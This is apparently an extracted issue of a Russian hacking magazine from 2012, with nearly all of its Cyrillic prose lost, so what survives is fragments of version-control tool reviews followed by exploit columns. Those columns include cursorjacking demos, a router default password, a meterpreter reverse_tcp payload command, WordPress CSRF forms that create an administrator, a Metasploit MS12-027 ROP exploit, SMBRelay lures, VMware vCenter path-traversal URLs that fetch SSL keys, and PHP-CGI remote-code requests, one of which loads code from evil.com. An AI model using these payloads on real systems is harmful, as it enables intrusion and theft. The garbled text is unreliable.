07 /162/ 2012
. : ,

(
,

). ,

1000 , 20 .
20 ,
,
10 .
.
.
,

. ,
. :
. :
, 20
1000 . 1:20,
20/(1000/20) =
0,4 $.
400
. .
50
- 6 , 400
(20 6)/(1000/20)*1 000
000 = 280 .
1:50, 1:12, , ,
200 .
, . .
,
. ,
,

. , ,
-
07 /162/ 2012

,
.

. ,

. ,
. ,
,
megaupload.com
.

, .

.
:
filehosting.com,
nekaka.com
( API
).
, ,
, (
-).

, .
,
,
.

, , -10 Google
.
, .

.
400 ,
. ,
, , :).
,

.

,

,
.
300500 .
, ,
.

.
, , .
, ,
, , ,
, , .

-.
.
,
. ,
90% ,
600
. 98%
120 .
,
, ,
. ,
, .
,
! z
!
, , ,

nekaka.com/reg/x.
31.07.2012.
039
PC ZONE

.
,
.

Windows
:
CVS, SVN, Git, Mercurial.
, ,
, . ,
, ,
: project, project_old, project_olders...
project1, project1.1, project1.2. , ,
?
? , , -
. - , .
, . , ,
Word, ,
.
,
.
CVS
, ,

CVS.
C-
ACK (Amsterdam Compiler Kit)
cmt ( commit).
,
, ,
,
.

, CVS
2008 .
.
,
CVS. , ,
:

, ; -ASCII
;
;

.
,
CVS ,

.
040
TortoiseCVS
WinCVS
TORTOISECVS.ORG
CVSGUI.SOURCEFORGE.NET

CVS TortoiseCVS,
Windows,
CVS .
,
CVS CVS ( , ,
). , . TortoiseCVS
CVS
, GUI, cvs.exe
.
TortoiseCVS,
, WinCVS
.
CVS,

.
,
. WinCVS ,
CVS-.
diff- (
).
.
, .
07 /162/ 2012
Subversion (SVN)
Subversion , 2004 CollabNet
Inc. ,

CVS. SVN
CVS
. ,

. , SVN: Apache, GCC,
Free Pascal, Python, Ruby, FreeBSD, Haiku,
AROS MediaWiki. ,
,
Subversion
:

Subversion

,
;
.
1.5 ,
;

,
Subversion,
: ,

,
;
.svn
.
1.7
.svn, SQLite.
TortoiseSVN
TORTOISESVN.NET
,
Subversion- Windows. TortoiseCVS,
Windows. -
IDE, .
:
Subversion-;
IDE;
;
;
;
.
VisualSVN
WWW.VISUALSVN.COM
Subversion-
Visual Studio,
IDE.
Visual Studio 2005, 2008, 2010. TortoiseSVN:
, , Subversion, ,
. VisualSVN
, , ,
.

.
, .
07 /162/ 2012
DVD
041
PC ZONE
Git

,

Linux.
,
.
Git
. Git
,
. Darcs, BitKeeper, Mercurial,
Bazaar Monotone, Git
,
. Git
.
.
Git Git .
GIT ,
: LINUX, DRUPAL, CAIRO, GNU CORE
UTILITIES, MESA, WINE, CHROMIUM, COMPIZ
FUSION, FLIGHTGEAR, JQUERY, PHP

, Git
. :
;

VCS, CVS, SVN Mercurial;
, Git ;
- ;
Git
, rsync.
SmartGit
TortoiseGit
WWW.SYNTEVO.COM/SMARTGIT/INDEX.HTML
CODE.GOOGLE.COM/P/TORTOISEGIT
Git, Java.
Git, ,
GitHub. GitHub,
: Assembla, Beanstalk,
Codebase, Unfuddle.
:
, , .
diff-, ,
. -
Java,
. ,
, , , SmartGit .
Git Microsoft
Windows. ,
SVN TortoiseSVN
( Tortiose-
VCS), .
,
, .

MSysGit Git Windows,
TortoiseGit MSysGit
.

Git, TortoiseGit , .

:

Unicode Microsoft Windows;
SHA1,
;
/ , ;

.
,
Git
, :
Linux, Drupal, Cairo, GNU Core Utilities,
Mesa, Wine, Chromium, Compiz Fusion,
FlightGear, jQuery, PHP.
042
CVS2SVN
CVS SVN,
cvs2svn (cvs2svn.tigris.org). CVS
Subversion ( Git) ,
svnadmin. cvs2svn
, CVS: , ,
, , . ,
, , .
07 /162/ 2012
Mercurial (Hg)
Mercurial, Hg,
,

.
Python,

(, diff)
C.
Mercurial
Linux,
Windows, Mac OS
X UNIX-.

, Mercurial

(
),
(

),
( ).
TortoiseHg
(TORTOISEHG.BITBUCKET.ORG)
VisualHG
SHARESOURCE.ORG/
PROJECT/VISUALHG/
, ,

. VisualHG Visual Studio
(MSVS 2005, MSVS 2008 MSVS
2010), Mercurial-
IDE.
,
,

.
. VisualHG
.
VisualSVN,
,
, ,
Mercurial.
07 /162/ 2012

Mercurial. Windows .
.
TortoiseSVN TortioseGit,

. TortoiseHg
Mercurial, . ,
, .
Tortoise-, , ,
.

.

.
,

.
.
,

,

. z
043
/ EASY HACK
GreenDog , Digital Security (twitter.com/antyurin)
EASY
HACK
,
CURSORJACKING
, ui-redressing
clickjacking. , ,
HTML, CSS JavaScript, . - , - . ,
- ,
Facebook-
. .
. , frame-busting
(X-Frame-Options),
( ),
.
ui-redressing. , ,
. ,
. , .
.

.
(, , ) ,
. ,
, -,
,
(, Like).
, , ,
, ,
.
:
JavaScript .
044
, .
<style type="text/css">
#cursorjacking {
cursor:url("pointer2visible.png"),default;
}
#cursorjacking a {
cursor:url("pointer2visible.png"),default;
}
</style>
<div id="cursorjacking">
<a href="#" onClick="alert('Three');">Three</a>
<a href="#"
onClick="alert('Four');">Four</a>
</div>
cursorjacking
(Marcus Niemietz). CSS, . . .
, . (
, ) . ,
, .
, .
,
.
07 /162/ 2012
:).
Four
Three.
(Kotowicz), JS.
. -,
(style="cursor:none"). -, ( ),

. :
TRUE
FAKE
.
# :
<body style="cursor:none;height: 1000px;">
# ,
# " "
<img style="position: absolute;z-index:1000;"
id=cursor src="cursor.png" />
# ,
<button id=fake style="font-size: 150%;position:absolute;
top:100px;left:630px;">click me click me</button>
# ,
<div style="position:absolute;top:100px;left:30px;">
<a href="#" onclick="alert(/you clicked-me-instead/)">
i'm not important</a>
</div>
<script>
#
var oNode = document.getElementById('cursor');
#
var onmove = function (e) {
#
var nMoveX = e.clientX, nMoveY = e.clientY;
# ,
# 600
oNode.style.left = (nMoveX + 600)+"px";
oNode.style.top = nMoveY + "px";
};
#
document.body.addEventListener('mousemove',
onmove, true);
TRUE
FAKE
</script>
</body>
,

. ,
- 600
.
Twitter.
, . ,
FF Chrome. ,
( ),
. , ,
( ),
- .
: goo.gl/ME7fL, goo.gl/qAtQI.

.
, .
Wi-Fi- .
.
- :). Routerpwn
(routerpwn.com). .
,
MAC.
, - Routerpwn ,
-.
07 /162/ 2012
. -,
. :)
: ,
, IP , JavaScript URL.
,
.
Telnet D-Link DIR-300, :
login: Alphanetworks
password: wrgg19_c_dlwbr_dir300
045
/ EASY HACK
HTTPS-
. ,
- , . ,
-, .
,
, wireshark. ,
,
HTTP. .
SSL ,
.
, , !
SSL-
. ,

Burp ZAP. , .
, , ,
-, . ,
man-in-the-middle.
, , ,
, ,
. ,
Burp
.
1. Burp Internet Explorer.
2. https://google.com.
3. View.
4. Certificate Path
PortSwinger View.
5. Install .
, . -
, Dropbox .
? , -.
/ ,
.
, , easy ,
.
, Evernote
046
API
Monitor (www.rohitab.com). ,
API- ( - ),
. -
ProcMon ,
,
- .
. ,
, . .
. , Evernote. ,
,
HTTPS- IE Firefox. .
Evernote 32- API Monitor
( Evernote 32-). Evernote
. , API-
, ,
- ( IE FF ).
, , :).
API filter
, .
, .
Running Process evernote.exe,
Start Monitoring. , Evernote. API
Monitor . ,
, HEX buffer,
HTTP- Evernote.
, .
, Evernote :
, .
. ,
.
07 /162/ 2012

DLL-HIJACKING
-
,
Windows. ,
, , exe-
. -
,
.
. ,

,

DLL. DLL-hijacking , Windows
DLL .
:
1. , .
2. .
3. 16- .
4. Windows.
5. .
6. , .
,
DLL, .
,
.
PATH, , ,

. , PATH
, ,
, DLL.
, . -, PATH, . K,
. (-
) ,
(, - JAVA).
, .
. :
DLL-hijacking, PATH.
, ProcMon
. :
DLL-hijacking
1. contains- ProcMon:
Process name _;
Result Name not found;
Path PATH.
2. ( ):
wmic service _ call startservice
PATH DLL-hijacking. ,
. , .
, , , ,
. .
, DLL-hijacking
PATH .
.
, - .
, .
,
Metasploit meterpreter DLL-hijacking:
msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.0.1 D > dllname.dll
. !
,
(NTLM) :
- , ? , .
: - Ruby.
, .
07 /162/ 2012
, : -
, - , , , . ,
,
Burp ZAP owasp. .
Burp , .
047
(ivinside.blogspot.com)
(115612, . , . 1)
/
,
BSOD ,

.
CSRF WordPress
BRIEF
WordPress CMS,
. ross Site Request Forgery (
),
Ivano Binetti.
,

. -
antiCSRF (_wpnonce, _wpnonce_create-user,
_ajax_nonce, _wpnonce-custom-background-upload, _wpnonce-customheader-upload). ,
12 . ,

1, :
EXPLOIT

:
;
/;
/;
;
;
;
;
;
;
WordPress;
.
<html><body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change post title</H2>
<form method="POST" name="form0" action=
"http://<wordpress_ip>:80/wp-admin/admin-ajax.php">
<input type="hidden" name="post_title" value="hackedtitle"/>
<input type="hidden" name="post_name" value="hackedtitle"/>
<input type="hidden" name="mm" value="03"/>
<input type="hidden" name="jj" value="16"/>
<input type="hidden" name="aa" value="2012"/>
<input type="hidden" name="hh" value=""/>
<input type="hidden" name="mn" value=""/>
<input type="hidden" name="ss" value=""/>
<input type="hidden" name="post_author" value="1"/>
<input type="hidden" name="post_password" value=""/>
CVSSV2
6.0
(AV:N/AC:M/AU:S/C:P/I:P/A:P)
048
07 /162/ 2012
<input type="hidden" name="post_category%5B%5D" value="0"/>

<input type="hidden" name="post_category%5B%5D" value="1"/>
<input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/>
<input type="hidden" name="comment_status" value="open"/>
<input type="hidden" name="ping_status" value="open"/>
<input type="hidden" name="_status" value="publish"/>
<input type="hidden" name="post_format" value="0"/>
<input type="hidden" name="_inline_edit"
value="<sniffed_value>"/>
<input type="hidden" name="post_view" value="list"/>
<input type="hidden" name="screen" value="edit-post"/>
<input type="hidden" name="action" value="inline-save"/>
<input type="hidden" name="post_type" value="post"/>
<input type="hidden" name="post_ID" value="1"/>
<input type="hidden" name="edit_date" value="true"/>
<input type="hidden" name="post_status" value="all"/>
</form></body></html>
<wordpress_ip> ,
.
admin2 password
:
<html><body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add Administrator</H2>
<form method="POST" name="form0" action=
"http://<wordpress_ip>:80/wp-admin/user-new.php">
<input type="hidden" name="action" value="createuser"/>
<input type="hidden" name="_wpnonce_create-user"
value="<sniffed_value>"/>
<input type="hidden" name="_wp_http_referer" value=
"%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
<input type="hidden" name="user_login" value="admin2"/>
<input type="hidden" name="email" value="admin2@admin.com"/>
<input type="hidden" name="first_name"
value="admin2@admin.com"/>
<input type="hidden" name="last_name" value=""/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="password"/>
<input type="hidden" name="role" value="administrator"/>
<input type="hidden" name="createuser" value="Add+New+User+"/>
</form></body></html>
TARGETS
WordPress 3.3.1 .
SOLUTION
WordPress .
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
(regexp),
. ,
Ruby,
- .
EXPLOIT
, ^ (
) $ ( ) Ruby -
07 /162/ 2012

, . , URL, :
javascript:alert(1);exploit_code();/*
http://hi.com
*/
URL,
JavaScript-.
, Ruby,
. ,
,
^ $. , 90%
- Ruby,
, github.com, soundcloud.com, tumblr.com . , .
TARGETS
- Ruby.
SOLUTION
\A \z ,
.
MS12-027
ActiveX-
MSCOMCTL
CVSSV2
BASE SCORE:9.3
(HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
ActiveX- ListView, ListView2,
TreeView TreeView2 MSCOMCTL.OCX -,
Office RTF-. ITW
.
EXPLOIT
ActiveX-,
RTF-.
RTF
, :
Ruby
CVSSV2
\n!
, :
{\object\objocx\objsetsize\objw3240\objh570{\*\objclass
MyControl.MControl}...
MS Office 2007:
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit(ms12_027_mscomctl_bof) >
set payload windows/exec
payload => windows/exec
msf exploit(ms12_027_mscomctl_bof) > set cmd calc.exe
cmd => calc.exe
msf exploit(ms12_027_mscomctl_bof) > exploit
[*] Creating msf.doc file ...
049
/
[+] msf.doc stored at /home/pikofarad/.msf4/local/msf.doc
msf exploit(ms12_027_mscomctl_bof) >
MS Office 2010 metasploit msgr3en.dll,
ROP-. ROP- -, :).
wwlib.dll, MS Office. WinXP SP3, 2600. Word 2010,
Immunity Debugger.
mona.py,
corelanc0d3r ( Peter Van Eeckhoutte
). ImmDbg:
!mona rop -m wwlib
. . ROP- .
,
.
Log rop_chains.txt:
...
ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
-------------------------------------------------------def create_rop_chain()
rop_gadgets =
[
0x3231e980, # POP ECX # RETN [wwlib.dll]
0x316d14ac, # ptr to &VirtualAlloc() [IAT wwlib.dll]
0x31735c11, # MOV ESI,DWORD PTR DS:[ECX]
# RETN [wwlib.dll]
0x31ae7361, # POP EBP # RETN [wwlib.dll]
0x31837b34, # & jmp esp [wwlib.dll]
0x3235b6b8, # POP EBX # RETN [wwlib.dll]
0x00000001, # 0x00000001-> ebx
0x31ac2bca, # POP EDX # RETN [wwlib.dll]
0x00001000, # 0x00001000-> edx
0x325950f3, # POP ECX # RETN [wwlib.dll]
0x00000040, # 0x00000040-> ecx
0x31f3ca18, # POP EDI # RETN [wwlib.dll]
0x32596c01, # RETN (ROP NOP) [wwlib.dll]
0x31e5d5a6, # POP EAX # RETN [wwlib.dll]
0x90909090, # nop
0x31f2f672, # PUSHAD # RETN [wwlib.dll]
# rop chain generated with mona.py
# note: this chain may not work out of the box
# you may have to change order or fix some gadgets,
# but it should give you a head start
].flatten.pack("V*")
return rop_gadgets
end
...
create_rop_chain
,
ROP-:
...
# winword.exe v14.0.6024.1000 (SP1)
[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 /
7 SP1] English',
{
'Ret' => 0x32596c01,
# retn # wwlib.dll <--
'Rop' => true,
'RopOffset' => 120
}
],
...
- .
target == 1, MS
Office 2010:
msf > use exploit/windows/fileformat/ms12_027_mscomctl_
bof_wwlib_rop
msf > set target 1
target => 1
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) >
set payload windows/exec
payload => windows/exec
set cmd calc.exe
cmd => calc.exe
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) > exploit
[*] Creating msf.doc file ...
[+] msf.doc stored at /home/pikofarad/.msf4/local/msf.doc
msf.doc ...
TARGETS
Microsoft Office 2003 SP3, 2007 SP2/SP3, 2010 Gold/SP1; Office 2003
Web Components SP3; SQL Server 2000 SP4, 2005 SP4 2008 SP2/SP3/R2;
BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, 2009
Gold/R2; Visual FoxPro 8.0 SP1 9.0 SP2; Visual Basic 6.0.
SOLUTION
, .
Microsoft Incremental Linker Integer Overflow
CVSSV2
BASE SCORE: 7.2
metasploit.
ms12_027_mscomctl_bof.rb
ms12_027_mscomctl_bof_wwlib_rop.rb.
(AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
Walied Assar Microsoft Visual Studio 2008,
-
XSS Github, Ruby
Ruby
050
07 /162/ 2012
ROP-, MS Office 2010
.

(link.exe) ,
COFF. ,
. ,

PE- dumpbin.exe
link.exe /dump.
EXPLOIT
- ,
COFF, , . ReadStringsAndSymbols
COFF
, PointerToSymbolTable NumberOfSymbols
IMAGE_FILE_HEADER .
typedef struct _IMAGE_FILE_HEADER {
WORD Machine;
WORD NumberOfSections;
DWORD TimeDateStamp;
DWORD PointerToSymbolTable;
DWORD NumberOfSymbols;
WORD SizeOfOptionalHeader;
WORD Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
ReadStringsAndSymbols:
int type;
wchar_t* actionName;
int magic2;
void ReadStringsAndSymbols(DUMPSTATE* pDump, int xx,
wchar_t* fileName) {
if (pDump->PointerToSymbolTable && pDump->NumberOfSymbols){
actionName = L"ReadStringsAndSymbols.LoadStrings";
int SymEntrySize = (type==2) ? 0x14 : 0x12;
LoadStrings(pDump, filename, SymEntrySize);
// ...
actionName = L"ReadStringsAndSymbols.ReadSymbolTable";
ReadSymbolTableEx(pDump, ...);
}
pDump->StringsNSymbols = 0;
return;
}
07 /162/ 2012
, MS Office 2007
, ReadStringsAndSymbols
LoadStrings ReadSymbolTableEx.
LoadStrings , .
,
PbMappedRegion , ,
. ReadSymbolTableEx
ReadSymbolTableT ,
.
ReadSymbolTableT ReadSymbolTableEx
:
void ReadSymbolTableEx(int A, int NumberOfSymbols) {
// ...
ReadSymbolTableT(...);
unsigned long size = (NumberOfSymbols*4) + NumberOfSymbols;
size += size;
size += size;
void *p = AllocBlk(size);
// ...
ConvertRgImgSymToRgImgSymEx(NumberOfSymbols, p);
}
AllocBlk, , ,
RtlAllocateHeap. :
0x400
, 0x400 . , NumberOfSymbols
0x8000000C,
0xf0 , , 0x400 .
,
ConvertRgImgSymToRgImgSymEx. ,
. ConvertRgImgSymToRgImgSymEx
, . , , ... , ,
.
TARGETS
Microsoft Visual Studio 2008, 9.00.21022.08, ,
.
SOLUTION
. : ! :) z
051
Ares (sniff.su)
SMBRELAY
WINDOWS 7
SMBRelay
MITM-,

.
, ,
, ?
,
,
.
SMBRelay

SMB?
SMBRELAY
, SMB (Server Message

Block). : ,
SMB.

, ,
.
1983
,
, SMBRelay.
,
SMB, ,
SMBRelay
.
, SMB
:

(share-level authentication). , ,

. -
052
,
.

- NTLM (
LM).
challenge,

.
,
Integrated Windows Authentication (IWA).
07 /162/ 2012
SMBRelay
NTLM- XP
MITM- Intercepter-NG
GUI Intercepter-NG
, -
Windows ,
, ,
,
. SMB-
,
,

. .
. challenge.
5.
challenge,
.
6. response
,
.
7. , ,
.

.

.
2008
,
.
Microsoft
,
.
( ) .

, !
2008 smbrelay3 Tarasco
Security,

.
SMB SMB, , HTTP/IMAP/
POP3/SMTP. NTLM.
:
smbrelay3 ,
cmd.exe,
/,
. Windows XP SP3
cmd.exe
( MS08-068
). XP
Windows 2003 ( ). Windows
XP ,
-,
, 445-
TCP- ( NetBios
139).

,
IP- .
(
, ). , :
1.
SMB-.
2. , .
3. , .
4. ,

,
SMBRelay, 2001 .
Sir Dystic
Cult Of The Dead Cow.

IP-.
smbrelay2,
NetBios-.
,
NTLM challenge+response
(, Cain & Abel).
MITM?
, Intercepter
!
(Windows, Linux, BSD),
Android iOS.
Windows-,
: ,
, ARP Poison.
Intercepter Console Edition :
GUI- Ncurses.
.
MITM- ( SMBRelay)
Intercepter-NG .
.
,
IP-. IP-
, .
Stealth IP-,
. IP-
IP , (
).
07 /162/ 2012
053

SMBRelay ,
Windows 7.
SMBRELAY VS WINDOWS 7

, Windows 7 LAN Manager
authentication level
Send NTLMv2 response only.
NTLM
response
NTLMv2 (

). ,
SMBRelay ( smbrelay3
Metasploit)
NTLMv2-.
, ,
. smbrelay3 NTLMv2
Windows 7 Windows XP.
. Windows 7,
IE,
Intranet. :

some_host IP- , , , Intranet
,
. IE

Automaticaly detect intranet network:

,

. , , Windows
7
.
,
Intranet Win7
SMBRelay, .
,
,
, , ,

. , .
SMBRelay SMB
Signing,
.

,
, , .
SMB Signing ,

.

IPC$ ADMIN$:
,

(C$...) . SMBRelay.
SMBRELAY
SMBRelay
Intercepter-NG,
NTLMv2
( smbrelay4).
, 445-
,
HTTP SMB.

NTLM-,

, - .

:
,

, ettercap -.
,
.
? ,
Arp Poison -
,
SMBRelay-.
,
. HTML, :
<!DOCTYPE...>
<meta name="keywords"...>
<meta name="description"...>.

:
<iframe src=http://ip__:
____smbrelay
width="0" height="0"></iframe>
, , NTLM
IE/Chrome, Firefox (,
, Opera)
.

.
,
,
. SMBRelay

SMB Signing EnableSecuritySignature,
RequireSecuritySignature. . z
WWW
LLMNR-
Windows . Vista
, LLMNR (Link Local Multicast Name Resolution).
DNS .
,
. , DNS NBNS (NetBIOS Name Service).
some_name,
LLMNR. ,
DNS. ,
NBNS. LLMNR, , ,
, , NBNS.
LLMNR- ,
(Vista/7/W2k8) (2k/XP/2k3),
, LLMNR. ,
.
, LLMNR , Network
Discovery .
Intercepter-NG

, Resurrection
Mode, .

.

,
,
HTTP/FTP/SMB/IMAP/
POP3/SMTP,
.
,

.
054
bit.ly/36cpY4
;
bit.ly/LwV62S

Intercepter.
WARNING

.

,

.
07 /162/ 2012
, Digital Security (twitter.com/asintsov)
VMware vCenter
, .
VMware vCenter.
,
.
VMWARE VCENTER
../../FILE.EXT
.
. !
VMware. ,
, ,
, .
VMware , .
, , VMware vCenter.
, , 10 VMware ESX(i).
50 . ,
vCenter. , vCenter
,
ESX . ,
. .
: vCenter .

, , .
, . : vCenter.
VMware. ,
- ( TCP- 9084) - Jetty
. :
http://target:9084/vci/download/health.xml/%3f/../../../../
056
: ,
. : ?
,
, (. ).
? , vSphere-
vCenter SOAP,
HTTPS-, XML- , .
SOAP-, cookie c PHPSESSIONID, :). , , , SOAP- vCenter
, -
( ).
Jetty-- SOAP-.
http://target:9084/vci/download/health.xml/%3f/../../../../
../../ProgramData\VMware\VMware VirtualCenter\Logs\vpxdprofiler-6.log
vSphere.
-,
vSphere,
add-on Metasploit VASTO. 2010
Black Hat 2010.
,
( ,
,
vCenter, ).
Google
07 /162/ 2012
VMware vCenter
vCenter. ,
, ( - 2011)
, ,
Jetty -.
-!

?
( ), ,
. ,
, . ,
, ,
. - Jetty,
.
15 .
:
http://target:9084/vci/download/.\..\..\..\..\..\..\..\..\
FILE.EXT
, MITM-
ARP-SPOOFING,
. , IP- - . , SSL- (cain
),
, SSL-.
, .
.
VMWARE VCENTER ORCHESTRATOR

-, SOAP-!

.
VMware,
. , ,
, ,
SSL. SSL- (whireshark
). :
http://target:9084/vci/downloads/.\..\..\..\..\..\..\..\
Documents and Settings\All Users\Application Data\VMware\
VMware VirtualCenter\SSL\rui.key
0(LD)-DAY VULNERABILITIES
,
vCenter,
20092010 :
bit.ly/K5HiP1 - ESX,
;
bit.ly/sVyRcA Jetty,
VMware vCenter;
bit.ly/KYwhAB
, ;
bit.ly/K98Vqy Virtual Appliance Management

.
,
VASTO.
07 /162/ 2012
Black Hat ;-)
vCenter ,
,
. ,
.
. .
, :
Program files\VMware\Infrastructure\Orchestrator\
configuration\jetty\etc\passwd.properties
MD5-. ,
. ? MD5 . .
, . , , ,
. , ,
vCenter-,
,
.
HTML- , , , ,
, , .
, , ,
. :).
, ,
, , , , .
MOARRRRRR!
, , . ,
, .
, . , :
057
VASTO VS VCENTER
VASTO Metasploit VMware.
:
vmaware_login . , root,
wmware ( , ).
vmware_session_rider - vSphere,
SESSION_ID .
vmware_version VMware .
vmware_vilurker , MITM
, .
.
Program Files\VMware\Infrastructure\Orchestrator\
app-server\server\vmo\conf\plugins\VC.xml
000a506275767b74786b383a4a60be767
864740329d5fcf324ec7fc98b1e0aaeef
( ):
- - . ,
, . , .
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<virtual-infrastructure-hosts>
<virtual-infrastructure-host
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:type="VirtualCenterHost">
<enabled>true</enabled>
<url>https://new-virtual-center-host:443/sdk</url>
<administrator-username>vmware</administrator-username>
<administrator-password>000a506275767b74786b383a4a60be76786
4740329d5fcf324ec7fc98b1e0aaeef </administrator-password>
<pattern>%u</pattern>
</virtual-infrastructure-host>
</virtual-infrastructure-hosts>
C:\Program Files\VMware\Infrastructure\
Orchestrator\app-server\server\vmo\conf\vmo.propirties.
.
, .
, CTF LeetMore .
:) ,
,
. Java- , ,
. : ,
, (
). , Password01. :
vCenter !
058
#
pass = "000a506275767b74786b383a4a60be767
864740329d5fcf324ec7fc98b1e0aaeef"
#
len = (pass[0..2]).to_i #
enc_pass = pass[3..-1].scan(/.{2}/)
# hex-
dec_pass = (0...len).collect do |i|
byte = enc_pass[i].to_i(16) # hex
byte -= i #
#
byte.chr
end
# : "Password01."
puts "Password: # {dec_pass.join()}"
, 0-

. vCenter.
, Metasploit.
, 0- , . , , ,
.
.
.
, ! z
vCenter
07 /162/ 2012
Raz0r (raz0r.name)
PHP-CGI
,
,
PHP
-.
PHP
.

PHP-,
.
PHP
PHP , .
, , PHP,
, PHP CGI. ,
.

2012 Eindbazen
Nullcon CTF, capture-the-flag. PHP, , . ,
Nullcon ,
0-day- PHP. Eindbazen
PHP . , . PHP
.
,
.
reddit.com -
PHP, .
,
PHP-,
CGI. Eindbazen ,
, .
,
,
PHP-. Eindbazen
, ,
advisory, , .
060
,
PHP CGI. PHP - Apache.
mod_php,
07 /162/ 2012
PHP:
CGI-. Apache , RFC:

.
PHP-CGI? .
2004 , , PHP, CGI-
:
if (getenv("SERVER_SOFTWARE")
|| getenv("SERVER_NAME")
|| getenv("GATEWAY_INTERFACE")
|| getenv("REQUEST_METHOD")) {
cgi = 1;
}
if(!cgi) getopt(...)
Options +ExecCGI
AddHandler cgi-script .php
Action cgi-script /path/to/php-cgi
.
,
, , ,
. , , -
CGI-. , , ,

-: CGI PHP stdin-,

,
-.
getopt(), , .
argc argv ,
main() . argv,
- ( - --),
. - -
STDIN CGI,
- .
, , ,
. PHP-CGI
.
Apache ,
- ,
mod_action.
-.

SCRIPT_FILENAME, ,
. ,
stdin.
, , , , stdout.
, , stdin .
, .
CGI , stdin,
-. , ?
, -
stdin.
CGI RFC, ,
? URI-, =, -
, + ( ) stdin
, .htaccess
PHP Apache
. CGI (Common
Gateway Interface). CGI , -,
.
CGI - ,
.
c Apache
: mod_php FastCGI.
, Apache PHP CGI -:
07 /162/ 2012
061
,
.
, php-cgi ,
, :
s ;
n php.ini;
T <n> n ;
d foo[=bar]
php.ini.
-r
PHP- ,
CGI- .
, ,
. , ,
.
BLACKBOX? NOPE!
.
http://site.com/index.php?-s, PHP
, .
,
.
,
. , , ,
. , ,

.
RCE
, , -r
? , PHP, auto_
prepend_file auto_append_file, .
PHP-,
, On -
allow_url_include, ,
URL. ,
Suhosin patch, PHP,
'-n'. PHP php.ini, ,
.
:
http://site.com/index.php?-n+-dallow_url_include%3DOn+dauto_prepend_file%3Dhttp://evil.com/code.txt

php://input,
POST-.
auto_prepend_file php://input,
. POST-
:
POST /index.php?-n+-dallow_url_include%3DOn+dauto_prepend_file%3Dphp%3a%2f%2finput HTTP/1.1
Host: site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Connection: close
<?php system("uname -a"); ?>

, / /proc/
self/environ. , ,
ProcFS,
. ,
: CGI HTTP-
. ProcFS *nix-,
FreeBSD, /proc/
self/environ . -
PHP-CGI
234 076
PHP-CGI

Apache- mod_security,

DreamHost.
WWW
INFO
bit.ly/IwDW8y

Eindbazen;
bit.ly/JuwsOR

PHP-CGI,
;
bit.ly/goqH0F
CGI RFC;
bit.ly/KsYavW

2004 .
FastCGI,
CGI,

/
stdin stdout

-
UNIX
TCP/IP.
FastCGI

.
062
07 /162/ 2012
PHP:
/proc/self/environ
auto_prepend_file , User-Agent:
GET /index.php?-n+-dallow_url_include%3DOn+dauto_prepend_file%3D%2fproc%2fself%2fenviron HTTP/1.1
Host: site.com
User-Agent: <?php system("id"); ?>
Connection: close

PHP .
,
, , ,
. :
if(*decoded_query_string == '-' &&
strchr(decoded_query_string, '=') == NULL) {
skip_getopt = 1;
}
:
=, PHP CGI. ,
. ,
, = URL-
(%3d). , , %3d,
: /?-s+%3d.
decoded_query_string
query_string, ,
. ,
php-cgi.
, DreamHost,
Nullcon CTF, :
#!/bin/sh
exec /dh/cgi-system/php5.cgi $*
, php5.cgi $* ,
, . , sh-
php-cgi /?+-s.
PHP . .htaccess :
RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]
-5 PHP

: bit.ly/MBmqSZ
: PHP < 4.3.8, PHP < 5.0.1
: , 2004

,
_. ,
.
ZEND_HASH_DEL_KEY_OR_INDEX
: bit.ly/doi4UA
: PHP < 4.4.3, PHP < 5.1.3
: , 2006
ZHDKOI-
, Joomla, phpBB, Wordpress vBulletin.
-,
.
, unset().

GPC- unset(),
/ .
PHP-

: bit.ly/3zpJMN
: PHP < 5.3
: USH, 2009

LFI- RFI-.
null-. ,
magic_quotes_gpc null- ,
LFI-RFI-.
;
,
MAXPATHLEN.

: bit.ly/KOzjVr
: PHP < 5.2.14, PHP < 5.3.3
: , 2010
, -

. , unserialize()
, , ,
. , -
Zend Framework
_SESSION,
PHP- ZF.

: =, , -
403 (Forbidden).
, PHP ,
-. ,
, PHP-CGI .
, ,
. z
07 /162/ 2012
: bit.ly/LbpQqH
: PHP 5.3.9
: , 2012
5.3.9 PHP
max_input_vars,
PHP Hash Collision DoS,
GPC-.
,
. ,
max_input_vars ( 1000).
063
D1g1 , Digital Security (twitter.com/evdokimovds)
X-Tools
Landing Site
:
Wayne Huang
URL:
www.drivesploit.org
:
*nix/win
: Julien Tinnes
URL: metasm.cr0.org
: *nix/win
: Cong Zheng,
Ryan W Smith
URL: code.google.
com/p/apkinspector
: *nix
Exploit Server
Controller
Malware Server
DRIVE-BY DOWNLOAD

RUBY

ANDROID-

Drivesploit
Black Hat USA 2010,
DEF CON 18. metasploit-,
drive-by
download . ,
drive-by download ,
html iframe,
, ,

.

Aurora, 0-day IE
(CVE-2010-0249).
, ,
. , exploit-pack Metasploit .
Metasploit

.
Drivesploit:
Circumventing Automated and Manual Detection
of Browser Exploits (slidesha.re/a0zpH8).
,

.
METASM , , , !

(SSTIC, hack.lu, HITB, REcon).
Ruby.
:
APKinspector
apk-.
Android.
,

.

Android. APKinspector
:
(CFG);
Dalvik-;
-;
smali-;
Java-;
;
;
AndroidManifest.xml.
064
Intel IA32 (16/32/64 bits), MIPS PPC.

: ARM, Cell SPARC.
:
METASM , ,
. :
Raw ( -);
MZ, PE/COFF (32 64 bits);
ELF (32 64 bits);
Mach-O ( );
UniversalBinary;
